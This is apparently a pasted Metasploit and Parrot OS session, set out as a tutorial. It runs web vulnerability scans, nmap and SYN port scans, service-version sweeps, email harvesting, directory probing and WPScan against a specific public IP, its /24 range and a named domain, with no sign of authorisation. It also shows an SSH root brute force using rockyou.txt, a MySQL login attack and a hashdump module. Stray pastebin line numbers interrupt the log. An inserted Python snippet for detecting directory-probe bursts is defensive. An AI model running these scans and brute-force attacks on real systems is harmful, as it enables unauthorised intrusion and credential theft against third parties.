[*] Module auxiliary/scanner/http/file_same_name_dir
[*] Module auxiliary/scanner/http/files_dir
[*] Module auxiliary/scanner/http/http_put
[*] Module auxiliary/scanner/http/ms09_020_webdav_unicode_bypass
[*] Module auxiliary/scanner/http/prev_dir_same_name_file
[*] Module auxiliary/scanner/http/replace_ext
[*] Module auxiliary/scanner/http/soap_xml
[*] Module auxiliary/scanner/http/trace_axd
[*] Module auxiliary/scanner/http/verb_auth_bypass
[*]
=[ Unique Query testing ]=
============================================================
[*] Module auxiliary/scanner/http/blind_sql_query
[*] Module auxiliary/scanner/http/error_sql_injection
[*] Module auxiliary/scanner/http/http_traversal
[*] Module auxiliary/scanner/http/rails_mass_assignment
[*] Module exploit/multi/http/lcms_php_exec
[*]
=[ Query testing ]=
============================================================
[*]
=[ General testing ]=
============================================================
[*] Done.

All that remains now is to actually run the WMAP scan against our target URL.

RUN THE ENABLED MODULES

msf > wmap_run -e
[*] Using ALL wmap enabled modules.
[-] NO WMAP NODES DEFINED. Executing local modules
[*] Testing target:
[*] Site: 198.71.232.3 (198.71.232.3)
[*] Port: 80 SSL: false
============================================================
[*] Testing started. 2016-05-29 13:38:10 +0200
[*]
=[ SSL testing ]=
============================================================
[*] Target is not SSL. SSL modules disabled.
[*]
=[ Web Server testing ]=
============================================================
[*] Module auxiliary/scanner/http/http_version

[*] 198.71.232.3:80 DPS/1.0.3
[*] Module auxiliary/scanner/http/open_proxy
[*] Module auxiliary/scanner/http/robots_txt
[*] Module auxiliary/scanner/http/frontpage_login
[*] http://198.71.232.3/ may not support FrontPage Server Extensions
[*] Module auxiliary/scanner/http/host_header_injection
[*] Module auxiliary/admin/http/tomcat_administration
[*] Module auxiliary/admin/http/tomcat_utf8_traversal
[*] Attempting to connect to 198.71.232.3:80
[+] No File(s) found
[*] Module auxiliary/scanner/http/options
[*] Module auxiliary/scanner/http/drupal_views_user_enum
[-] 198.71.232.3 does not appear to be vulnerable, will not continue
[*] Module auxiliary/scanner/http/scraper
[*] [198.71.232.3] / [404 Not Found]
[*] Module auxiliary/scanner/http/svn_scanner
[*] Using code '404' as not found.
[*] Module auxiliary/scanner/http/trace
[*] Module auxiliary/scanner/http/vhost_scanner
[*] >> Exception during launch from auxiliary/scanner/http/vhost_scanner: The following options failed to validate: DOMAIN.
[*] Module auxiliary/scanner/http/webdav_internal_ip
[*] Module auxiliary/scanner/http/webdav_scanner
[*] Module auxiliary/scanner/http/webdav_website_content
[*]
=[ File/Dir testing ]=
============================================================
[*] Module auxiliary/dos/http/apache_range_dos
[*] Module auxiliary/scanner/http/backup_file
[*] Module auxiliary/scanner/http/brute_dirs
[*] Path: /
[*] Using code '404' as not found.
[*] Module auxiliary/scanner/http/copy_of_file
[*] Module auxiliary/scanner/http/dir_listing
[*] Path: /
[*] Module auxiliary/scanner/http/dir_scanner
[*] Path: /
[*] Detecting error code
[*] Using code '404' as not found for 198.71.232.3
[*] Module auxiliary/scanner/http/dir_webdav_unicode_bypass
[*] Path: /
[*] Using code '404' as not found.
[*] Module auxiliary/scanner/http/file_same_name_dir
[*] Path: /
[-] Blank or default PATH set.
[*] Module auxiliary/scanner/http/files_dir
[*] Path: /
[*] Using code '404' as not found for files with extension .null
[*] Module auxiliary/scanner/http/http_put
[*] Path: /
[-] File doesn't seem to exist. The upload probably failed.
[*] Module auxiliary/scanner/http/ms09_020_webdav_unicode_bypass
[*] Path: /
[-] 198.71.232.3:80 Folder does not require authentication. [404]
[*] Module auxiliary/scanner/http/prev_dir_same_name_file
[*] Path: /
[-] Blank or default PATH set.
[*] Module auxiliary/scanner/http/replace_ext
[*] Module auxiliary/scanner/http/soap_xml
[*] Path: /
[*] Starting scan with 0ms delay between requests
[-] The connection timed out (198.71.232.3:80).
[-] The connection timed out (198.71.232.3:80).
[*] Module auxiliary/scanner/http/trace_axd
[*] Path: /
[*] Module auxiliary/scanner/http/verb_auth_bypass
[*]
=[ Unique Query testing ]=
============================================================
[*] Module auxiliary/scanner/http/blind_sql_query
[*] Module auxiliary/scanner/http/error_sql_injection
[*] Module auxiliary/scanner/http/http_traversal
[*] Module auxiliary/scanner/http/rails_mass_assignment
[*] Module exploit/multi/http/lcms_php_exec
[*]
=[ Query testing ]=
============================================================
[*]
=[ General testing ]=
============================================================
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Launch completed in 8302.240582227707 seconds.
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[*] Done.

Once the scan has finished executing, we take a look at the database to see if WMAP found anything of interest.


CHECK THE VULNERABILITIES FOUND BY WMAP

msf > wmap_vulns -l
[*] + [198.71.232.3] (198.71.232.3): scraper /
[*] scraper Scraper
[*] GET 404 Not Found


LIST THE VULNERABILITIES STORED IN THE DB

msf > vulns


RUN DB_NMAP

msf > db_nmap 198.71.232.3 -PN
[*] Nmap: Starting Nmap 7.01 ( https://nmap.org ) at 2016-05-29 17:31 CEST
[*] Nmap: 'mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers'
[*] Nmap: Nmap scan report for 198.71.232.3
[*] Nmap: Host is up (0.11s latency).
[*] Nmap: Not shown: 998 filtered ports
[*] Nmap: PORT    STATE SERVICE
[*] Nmap: 80/tcp  open  http
[*] Nmap: 443/tcp open  https
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 13.02 seconds

EXPORT THE WORKSPACE (INCLUDING THE NMAP RESULTS)

msf > db_export -f xml /root/Desktop/Exported.xml
[*] Starting export of workspace default to /root/Desktop/Exported.xml [ xml ]...
[*] >> Starting export of report
[*] >> Starting export of hosts
[*] >> Starting export of events
[*] >> Starting export of services
[*] >> Starting export of web sites
[*] >> Starting export of web pages
[*] >> Starting export of web forms
[*] >> Starting export of web vulns
[*] >> Starting export of module details
[*] >> Finished export of report
[*] Finished export of workspace default to /root/Desktop/Exported.xml [ xml ]...


IMPORT THE EXPORTED WORKSPACE

msf > db_import /root/Desktop/Exported.xml
[*] Importing 'Metasploit XML' data
[*] Importing host 198.71.232.0
[*] Importing host 198.71.232.1
[*] Importing host 198.71.232.2
[*] Importing host 198.71.232.3
[*] Importing host 198.71.232.4
[*] Importing host 198.71.232.5
[*] Importing host 198.71.232.6
[*] Importing host 198.71.232.7
[*] Importing host 198.71.232.9
[*] Successfully imported /root/Desktop/Exported.xml


msf > hosts

Hosts
=====

   address       mac  name          os_name  os_flavor  os_sp  purpose  info  comments
   -------       ---  ----          -------  ---------  -----  -------  ----  --------
   198.71.232.0                     Unknown                    device
   198.71.232.1                     Unknown                    device
   198.71.232.2                     Unknown                    device
   198.71.232.3       198.71.232.3  Unknown                    device
   198.71.232.4                     Unknown                    device
   198.71.232.5                     Unknown                    device
   198.71.232.6                     Unknown                    device
   198.71.232.7                     Unknown                    device
   198.71.232.9                     Unknown                    device


msf > hosts -c address,os_flavor

Hosts
=====

   address       os_flavor
   -------       ---------
   198.71.232.0
   198.71.232.1
   198.71.232.2
   198.71.232.3
   198.71.232.4
   198.71.232.5
   198.71.232.6
   198.71.232.7
   198.71.232.9


msf > hosts -c address,os_flavor -S Linux

msf auxiliary(tcp) > show options

msf auxiliary(tcp) > hosts -c address,os_flavor -S Linux -R

RHOSTS => 198.71.232.3

msf auxiliary(tcp) > run

msf auxiliary(tcp) > hosts -R

RHOSTS => 198.71.232.3

msf auxiliary(tcp) > show options

msf > services -c name,info 198.71.232.3

Services
========

   host          name   info
   ----          ----   ----
   198.71.232.3  http   DPS/1.0.3
   198.71.232.3  https


msf > services -c name,info -S http

Services
========

   host          name   info
   ----          ----   ----
   198.71.232.3  http   DPS/1.0.3
   198.71.232.3  https
   198.71.232.4  https
   198.71.232.4  http
   198.71.232.5  https
   198.71.232.6  http
   198.71.232.6  https
   198.71.232.7  http
   198.71.232.7  https
   198.71.232.9  http

msf > services -c name,info -S https

Services
========

   host          name   info
   ----          ----   ----
   198.71.232.3  https
   198.71.232.4  https
   198.71.232.5  https
   198.71.232.6  https
   198.71.232.7  https


msf > services -c info,name -p 443

Services
========

   host          info  name
   ----          ----  ----
   198.71.232.3        https
   198.71.232.4        https
   198.71.232.5        https
   198.71.232.6        https
   198.71.232.7        https


msf > services -c port,proto,state -p 70-81

Services
========

   host          port  proto  state
   ----          ----  -----  -----
   198.71.232.3  80    tcp    open
   198.71.232.4  80    tcp    open
   198.71.232.6  80    tcp    open
   198.71.232.7  80    tcp    open
   198.71.232.9  80    tcp    open

msf > services -c port,proto,state -p 70-81-3306

Services
========

   host          port  proto  state
   ----          ----  -----  -----
   198.71.232.3  80    tcp    open
   198.71.232.4  80    tcp    open
   198.71.232.6  80    tcp    open
   198.71.232.7  80    tcp    open
   198.71.232.9  80    tcp    open


msf > services -c port,proto,state -p 21-22-25-70-80-81-443-3306

Services
========

   host          port  proto  state
   ----          ----  -----  -----
   198.71.232.7  22    tcp    open


msf > services -s http -c port 198.71.232.3

Services
========

   host          port
   ----          ----
   198.71.232.3  80

msf > services -s https -c port 198.71.232.3

Services
========

   host          port
   ----          ----
   198.71.232.3  443


msf > services -S Unr

Services
========

   host  port  proto  name  state  info
   ----  ----  -----  ----  -----  ----


CSV Export

msf > services -s http -c port 198.71.232.3 -o /root/Desktop/http.csv

[*] Wrote services to /root/Desktop/http.csv

msf > services -s https -c port 198.71.232.3 -o /root/Desktop/https.csv

[*] Wrote services to /root/Desktop/https.csv

msf > hosts -S Linux -o /root/Desktop/linux.csv
[*] Wrote hosts to /root/Desktop/linux.csv

msf > cat /root/Desktop/http.csv
[*] exec: cat /root/Desktop/http.csv

host,port
"198.71.232.3","80"

msf > cat /root/Desktop/https.csv
[*] exec: cat /root/Desktop/https.csv

host,port
"198.71.232.3","443"

msf > cat /root/Desktop/linux.csv
[*] exec: cat /root/Desktop/linux.csv

address,mac,name,os_name,os_flavor,os_sp,purpose,info,comments

RELOAD ALL METASPLOIT MODULES

msf > reload_all
[*] Reloading modules from all module paths...

(msfconsole ASCII-art banner omitted)

http://metasploit.pro


Easy phishing: Set up email templates, landing pages and listeners
in Metasploit Pro -- learn more on http://rapid7.com/metasploit

       =[ metasploit v4.11.5-2016010401                   ]
+ -- --=[ 1517 exploits - 875 auxiliary - 257 post        ]
+ -- --=[ 437 payloads - 37 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]


USE ARP_SWEEP

msf > use auxiliary/scanner/discovery/arp_sweep
msf auxiliary(arp_sweep) > show options

Module options (auxiliary/scanner/discovery/arp_sweep):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   INTERFACE                   no        The name of the interface
   RHOSTS                      yes       The target address range or CIDR identifier
   SHOST                       no        Source IP Address
   SMAC                        no        Source MAC Address
   THREADS    1                yes       The number of concurrent threads
   TIMEOUT    5                yes       The number of seconds to wait for new data

msf auxiliary(arp_sweep) > set RHOSTS 198.71.232.3/24
RHOSTS => 198.71.232.3/24
msf auxiliary(arp_sweep) > set THREADS 50
THREADS => 50
msf auxiliary(arp_sweep) > run

[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed

(No host is reported: ARP only works on the local link, so an ARP sweep of a remote public /24 cannot find anything. For a remote range use the nmap ping sweep that follows.)

msf auxiliary(arp_sweep) > back

USE NMAP

msf > nmap -sn 198.71.232.3/24
[*] exec: nmap -sn 198.71.232.3/24


Starting Nmap 7.01 ( https://nmap.org ) at 2016-05-29 18:31 CEST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 198.71.232.0
Host is up (0.11s latency).
Nmap scan report for 198.71.232.1
Host is up (0.11s latency).
Nmap scan report for 198.71.232.2
Host is up (0.11s latency).
Nmap scan report for 198.71.232.3
Host is up (0.11s latency).
Nmap scan report for 198.71.232.4
Host is up (0.11s latency).
Nmap scan report for 198.71.232.5
Host is up (0.11s latency).
Nmap scan report for 198.71.232.6
Host is up (0.11s latency).
Nmap scan report for 198.71.232.7
Host is up (0.11s latency).
Nmap scan report for 198.71.232.8
Host is up (0.11s latency).
Nmap scan report for 198.71.232.9
Host is up (0.11s latency).
Nmap done: 256 IP addresses (10 hosts up) scanned in 5.25 seconds


msf > nmap -PU -sn 198.71.232.3/24
[*] exec: nmap -PU -sn 198.71.232.3/24


Starting Nmap 7.01 ( https://nmap.org ) at 2016-05-29 18:33 CEST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap done: 256 IP addresses (0 hosts up) scanned in 52.11 seconds


msf > nmap -O 198.71.232.3
[*] exec: nmap -O 198.71.232.3


Starting Nmap 7.01 ( https://nmap.org ) at 2016-05-29 18:34 CEST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 198.71.232.3
Host is up (0.11s latency).
Not shown: 998 filtered ports
PORT    STATE SERVICE
80/tcp  open  http
443/tcp open  https
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host

OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.57 seconds


SEARCH PORTSCAN

msf > search portscan

Matching Modules
================

   Name                                              Disclosure Date  Rank    Description
   ----                                              ---------------  ----    -----------
   auxiliary/scanner/http/wordpress_pingback_access                   normal  Wordpress Pingback Locator
   auxiliary/scanner/natpmp/natpmp_portscan                           normal  NAT-PMP External Port Scanner
   auxiliary/scanner/portscan/ack                                     normal  TCP ACK Firewall Scanner
   auxiliary/scanner/portscan/ftpbounce                               normal  FTP Bounce Port Scanner
   auxiliary/scanner/portscan/syn                                     normal  TCP SYN Port Scanner
   auxiliary/scanner/portscan/tcp                                     normal  TCP Port Scanner
   auxiliary/scanner/portscan/xmas                                    normal  TCP "XMas" Port Scanner
   auxiliary/scanner/sap/sap_router_portscanner                       normal  SAPRouter Port Scanner

USE PORTSCAN

msf > use auxiliary/scanner/portscan/syn

msf auxiliary(syn) > set RHOSTS 198.71.232.3

RHOSTS => 198.71.232.3

msf auxiliary(syn) > set THREADS 200

THREADS => 200

msf auxiliary(syn) > run

[*] TCP OPEN 198.71.232.3:80
[*] TCP OPEN 198.71.232.3:443

SEARCH NAME_VERSION

msf > search name:_version

USE TELNET AUXILIARY SCANNER

msf > use auxiliary/scanner/telnet/telnet_version
msf auxiliary(telnet_version) > set RHOSTS 198.71.232.3/24
RHOSTS => 198.71.232.3
msf auxiliary(telnet_version) > set THREADS 100
THREADS => 100
msf auxiliary(telnet_version) > run

[*] Scanned 41 of 256 hosts (16% complete)
[*] Scanned 93 of 256 hosts (36% complete)
[*] Scanned 96 of 256 hosts (37% complete)
[*] Scanned 130 of 256 hosts (50% complete)
[*] Scanned 131 of 256 hosts (51% complete)
[*] Scanned 192 of 256 hosts (75% complete)
[*] Scanned 193 of 256 hosts (75% complete)
[*] Scanned 211 of 256 hosts (82% complete)
[*] Scanned 241 of 256 hosts (94% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(telnet_version) >


USE AUXILIARY SSH_VERSION

msf auxiliary(telnet_version) > use auxiliary/scanner/ssh/ssh_version
msf auxiliary(ssh_version) > show options

Module options (auxiliary/scanner/ssh/ssh_version):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target address range or CIDR identifier
   RPORT    22               yes       The target port
   THREADS  1                yes       The number of concurrent threads
   TIMEOUT  30               yes       Timeout for the SSH probe

msf auxiliary(ssh_version) > set RHOSTS 198.71.232.3/24
RHOSTS => 198.71.232.3/24
msf auxiliary(ssh_version) > set THREADS 200
THREADS => 200
msf auxiliary(ssh_version) > run

[*] 198.71.232.7:22 SSH server version: SSH-2.0-OpenSSH_6.3 ( service.version=6.3 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH )
[*] Scanned 42 of 256 hosts (16% complete)
[*] Scanned 77 of 256 hosts (30% complete)
[*] Scanned 119 of 256 hosts (46% complete)
[*] Scanned 136 of 256 hosts (53% complete)
  2282. [*] Scanned 137 of 256 hosts (53% complete)
  2283. [*] Scanned 156 of 256 hosts (60% complete)
  2284. [*] Scanned 187 of 256 hosts (73% complete)
  2285. [*] Scanned 253 of 256 hosts (98% complete)
  2286. [*] Scanned 255 of 256 hosts (99% complete)
  2287. [*] Scanned 256 of 256 hosts (100% complete)
  2288. [*] Auxiliary module execution completed
  2289.  
  2290.  
  2291. USE ORACLE SCANNER
  2292.  
  2293. msf auxiliary(tnslsnr_version) > show options
  2294.  
  2295. Module options (auxiliary/scanner/oracle/tnslsnr_version):
  2296.  
  2297. Name Current Setting Required Description
  2298. ---- --------------- -------- -----------
  2299. RHOSTS yes The target address range or CIDR identifier
  2300. RPORT 1521 yes The target port
  2301. THREADS 1 yes The number of concurrent threads
  2302.  
  2303. msf auxiliary(tnslsnr_version) > set RHOSTS 198.71.232.3/24
  2304. RHOSTS => 198.71.232.3/24
  2305. msf auxiliary(tnslsnr_version) > set THREADS 200
  2306. THREADS => 200
  2307. msf auxiliary(tnslsnr_version) > run
  2308.  
  2309. [*] Scanned 105 of 256 hosts (41% complete)
  2310. [*] Scanned 113 of 256 hosts (44% complete)
  2311. [*] Scanned 131 of 256 hosts (51% complete)
  2312. [*] Scanned 188 of 256 hosts (73% complete)
  2313. [*] Scanned 200 of 256 hosts (78% complete)
  2314. [*] Scanned 237 of 256 hosts (92% complete)
  2315. [*] Scanned 243 of 256 hosts (94% complete)
  2316. [*] Scanned 250 of 256 hosts (97% complete)
  2317. [*] Scanned 252 of 256 hosts (98% complete)
  2318. [*] Scanned 256 of 256 hosts (100% complete)
  2319. [*] Auxiliary module execution completed
  2320.  
  2321.  
  2322. USE OPEN_PROXY
  2323.  
  2324. msf auxiliary(tnslsnr_version) > use auxiliary/scanner/http/open_proxy
  2325.  
  2326. msf auxiliary(open_proxy) > show options
  2327.  
Module options (auxiliary/scanner/http/open_proxy):

Name Current Setting Required Description
---- --------------- -------- -----------
LOOKUP_PUBLIC_ADDRESS false no Enable test for retrieve public IP address via RIPE.net
MULTIPORTS false no Multiple ports will be used : 80, 1080, 3128, 8080, 8123
RANDOMIZE_PORTS false no Randomize the order the ports are probed
RHOSTS yes The target address range or CIDR identifier
RPORT 8080 yes The target port
SITE www.google.com yes The web site to test via alleged web proxy (default is www.google.com)
THREADS 1 yes The number of concurrent threads
UserAgent Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) yes The HTTP User-Agent sent in the request
VERIFY_CONNECT false no Enable test for CONNECT method
VERIFY_HEAD false no Enable test for HEAD method
ValidCode 200,302 no Valid HTTP code for a successfully request
ValidPattern server: gws no Valid HTTP server header for a successfully request

msf auxiliary(open_proxy) > set LOOKUP_PUBLIC_ADDRESS true
LOOKUP_PUBLIC_ADDRESS => true
msf auxiliary(open_proxy) > set MULTIPORTS true
MULTIPORTS => true
msf auxiliary(open_proxy) > show options

Module options (auxiliary/scanner/http/open_proxy):

Name Current Setting Required Description
---- --------------- -------- -----------
LOOKUP_PUBLIC_ADDRESS true no Enable test for retrieve public IP address via RIPE.net
MULTIPORTS true no Multiple ports will be used : 80, 1080, 3128, 8080, 8123
RANDOMIZE_PORTS false no Randomize the order the ports are probed
RHOSTS yes The target address range or CIDR identifier
RPORT 8080 yes The target port
SITE www.google.com yes The web site to test via alleged web proxy (default is www.google.com)
THREADS 1 yes The number of concurrent threads
UserAgent Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) yes The HTTP User-Agent sent in the request
VERIFY_CONNECT false no Enable test for CONNECT method
VERIFY_HEAD false no Enable test for HEAD method
ValidCode 200,302 no Valid HTTP code for a successfully request
ValidPattern server: gws no Valid HTTP server header for a successfully request

msf auxiliary(open_proxy) > set RANDOMIZE_PORTS true
RANDOMIZE_PORTS => true
msf auxiliary(open_proxy) > set RHOSTS 198.71.232.3
RHOSTS => 198.71.232.3
msf auxiliary(open_proxy) > set RPORT 8080
RPORT => 8080
msf auxiliary(open_proxy) > run

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(open_proxy) >


USE SSH_LOGIN

msf auxiliary(open_proxy) > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > set RHOSTS 198.71.232.3
RHOSTS => 198.71.232.3
msf auxiliary(ssh_login) > set USERNAME root
USERNAME => root
msf auxiliary(ssh_login) > set PASS_FILE /root/Desktop/rockyou.txt
PASS_FILE => /root/Desktop/rockyou.txt
msf auxiliary(ssh_login) > set THREADS 2000
THREADS => 2000
msf auxiliary(ssh_login) > run

[*] 198.71.232.3:22 SSH - Starting bruteforce
[-] 198.71.232.3:22 SSH - Could not connect: The connection timed out (198.71.232.3:22).
[-] 198.71.232.3:22 SSH - Could not connect: The connection timed out (198.71.232.3:22).
[-] 198.71.232.3:22 SSH - Could not connect: The connection timed out (198.71.232.3:22).
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed


USE AUXILIARY DIR_SCANNER

msf auxiliary(ssh_login) > use auxiliary/scanner/http/dir_scanner
msf auxiliary(dir_scanner) > set THREADS 50
THREADS => 50
msf auxiliary(dir_scanner) > set RHOSTS 198.71.232.3
RHOSTS => 198.71.232.3
msf auxiliary(dir_scanner) > exploit

[*] Detecting error code
[*] Using code '404' as not found for 198.71.232.3
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(dir_scanner) > set RHOSTS www.vyxunbnbs.com
RHOSTS => www.vyxunbnbs.com
msf auxiliary(dir_scanner) > exploit

[*] Detecting error code
[*] Using code '404' as not found for 198.71.232.3
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(dir_scanner) > set RHOSTS vyxunbnbs.com
RHOSTS => vyxunbnbs.com
msf auxiliary(dir_scanner) > exploit

[*] Detecting error code
[*] Using code '404' as not found for 198.71.232.3
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(dir_scanner) >


USE EMAIL_COLLECTOR

msf auxiliary(dir_scanner) > use auxiliary/gather/search_email_collector

msf auxiliary(search_email_collector) > set DOMAIN vyxunbnbs.com

DOMAIN => vyxunbnbs.com

msf auxiliary(search_email_collector) > run

[*] Harvesting emails .....
[*] Searching Google for email addresses from vyxunbnbs.com
[*] Extracting emails from Google search results...
[*] Searching Bing email addresses from vyxunbnbs.com
[*] Extracting emails from Bing search results...
[*] Searching Yahoo for email addresses from vyxunbnbs.com
[*] Extracting emails from Yahoo search results...
[*] Located 0 email addresses for vyxunbnbs.com
[*] Auxiliary module execution completed


msf auxiliary(search_email_collector) > use auxiliary/scanner/mysql/mysql_login
msf auxiliary(mysql_login) > show options

Module options (auxiliary/scanner/mysql/mysql_login):

Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target address range or CIDR identifier
RPORT 3306 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts

msf auxiliary(mysql_login) > set RHOSTS vyxunbnbs.com
RHOSTS => vyxunbnbs.com
msf auxiliary(mysql_login) > run

[-] 198.71.232.3:3306 MYSQL - Unable to connect: The connection timed out (198.71.232.3:3306).
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(mysql_login) >

msf auxiliary(mysql_login) > creds

msf auxiliary(mysql_login) > sessions -l

Active sessions
===============

No active sessions.


USE LOOT

msf > loot -h

Usage: loot [-h] [addr1 addr2 ...] [-t <type1,type2>]

-t <type1,type2> Search for a list of types
-h,--help Show this help information
-S,--search Search string to filter by

Here's an example of how one would populate the database with some 'loot'.

msf exploit(usermap_script) > use post/linux/gather/hashdump
msf post(hashdump) > show options

msf post(hashdump) > loot

Loot
====

host service type name content info path
---- ------- ---- ---- ------- ---- ----

USE AUXILIARY SCANNER HTTP CRAWLER

msf post(hashdump) > use auxiliary/scanner/http/crawler
msf auxiliary(crawler) > set RHOST vyxunbnbs.com
RHOST => vyxunbnbs.com
msf auxiliary(crawler) > run

[*] Crawling http://vyxunbnbs.com:80/...
[*] [00001/00500] 301 - vyxunbnbs.com - http://vyxunbnbs.com/ -> http://www.vyxunbnbs.com/
[*] Crawl of http://vyxunbnbs.com:80/ complete
[*] Auxiliary module execution completed

msf auxiliary(crawler) >

[*] Done.

CHECK THE SITE WITH PARSERO

┌─[root@parrot]─[~]
└──╼ #parsero -u www.vyxunbnbs.com

____
| _ \ __ _ _ __ ___ ___ _ __ ___
| |_) / _` | '__/ __|/ _ \ '__/ _ \
| __/ (_| | | \__ \ __/ | | (_) |
|_| \__,_|_| |___/\___|_| \___/

Starting Parsero v0.75 (https://github.com/behindthefirewalls/Parsero) at 05/29/16 19:59:04
Parsero scan report for www.vyxunbnbs.com
http://www.vyxunbnbs.com/images/ 404 Not Found
http://www.vyxunbnbs.com/_temp/ 404 Not Found
http://www.vyxunbnbs.com/statshistory/ 404 Not Found
http://www.vyxunbnbs.com/_backup/ 404 Not Found
http://www.vyxunbnbs.com/Flash/ 404 Not Found
http://www.vyxunbnbs.com/stats/ 404 Not Found
http://www.vyxunbnbs.com/plugins/ 404 Not Found
http://www.vyxunbnbs.com/_mygallery/ 404 Not Found
http://www.vyxunbnbs.com/_tempalbums/ 404 Not Found
http://www.vyxunbnbs.com/dbboon/ 404 Not Found
http://www.vyxunbnbs.com/cache/ 404 Not Found
http://www.vyxunbnbs.com/scripts/ 404 Not Found
http://www.vyxunbnbs.com/mobile/ 200 OK
http://www.vyxunbnbs.com/_tmpfileop/ 404 Not Found
http://www.vyxunbnbs.com/QSC/ 404 Not Found

[+] 15 links have been analyzed and 1 of them are available!!!

Finished in 2.3001761436462402 seconds


http://www.vyxunbnbs.com/mobile/ 200 OK


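Seen from the web server, the dir_scanner and Parsero runs above leave the same trace: one client reads robots.txt and then requests a dozen directories within a couple of seconds, collecting a 404 for almost every one. As an added example (not part of the original paste or of either tool), the Python below runs that detection over constructed Apache combined-format log lines; the client addresses, the threshold of 4 misses in a 10-second window, and the log format are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Apache "combined" log lines (sample data, not from the page).
# 203.0.113.5 reads robots.txt, then probes Disallow'd directories within
# two seconds; 198.51.100.7 is ordinary traffic with a single stray 404.
SAMPLE_LOG = """\
203.0.113.5 - - [29/May/2016:19:59:03 +0000] "GET /robots.txt HTTP/1.1" 200 512 "-" "-"
203.0.113.5 - - [29/May/2016:19:59:04 +0000] "GET /images/ HTTP/1.1" 404 209 "-" "-"
203.0.113.5 - - [29/May/2016:19:59:04 +0000] "GET /_temp/ HTTP/1.1" 404 209 "-" "-"
203.0.113.5 - - [29/May/2016:19:59:04 +0000] "GET /_backup/ HTTP/1.1" 404 209 "-" "-"
203.0.113.5 - - [29/May/2016:19:59:05 +0000] "GET /cache/ HTTP/1.1" 404 209 "-" "-"
203.0.113.5 - - [29/May/2016:19:59:05 +0000] "GET /mobile/ HTTP/1.1" 200 3150 "-" "-"
198.51.100.7 - - [29/May/2016:19:59:05 +0000] "GET /index.html HTTP/1.1" 200 4096 "-" "-"
198.51.100.7 - - [29/May/2016:19:59:40 +0000] "GET /missing.png HTTP/1.1" 404 209 "-" "-"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) '
)


def parse_line(line):
    """Return (ip, timestamp, path, status) or None for unparseable lines."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return m.group("ip"), ts, m.group("path"), int(m.group("status"))


def find_probe_bursts(log_text, threshold=4, window_seconds=10):
    """Flag clients that collect `threshold` or more 404s inside a sliding
    window of `window_seconds`. Returns {ip: {"misses": n, "paths": [...],
    "read_robots": bool}} for flagged clients only."""
    by_ip = defaultdict(list)
    read_robots = set()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ip, ts, path, status = rec
        if path == "/robots.txt":
            read_robots.add(ip)   # strong hint that the misses are robots-driven
        if status == 404:
            by_ip[ip].append((ts, path))

    window = timedelta(seconds=window_seconds)
    flagged = {}
    for ip, hits in by_ip.items():
        hits.sort()
        start = 0
        for end in range(len(hits)):
            # slide the window start forward until it spans <= window_seconds
            while hits[end][0] - hits[start][0] > window:
                start += 1
            if end - start + 1 >= threshold:
                flagged[ip] = {"misses": len(hits),
                               "paths": sorted({p for _, p in hits}),
                               "read_robots": ip in read_robots}
                break
    return flagged
```

Alerting on the burst rather than on any single 404 keeps ordinary broken links (like the lone /missing.png above) out of the results.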
CHECK THE SITE WITH WPSCAN

┌─[root@parrot]─[~]
└──╼ #wpscan --url www.vyxunbnbs.com/mobile --enumerate u
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __
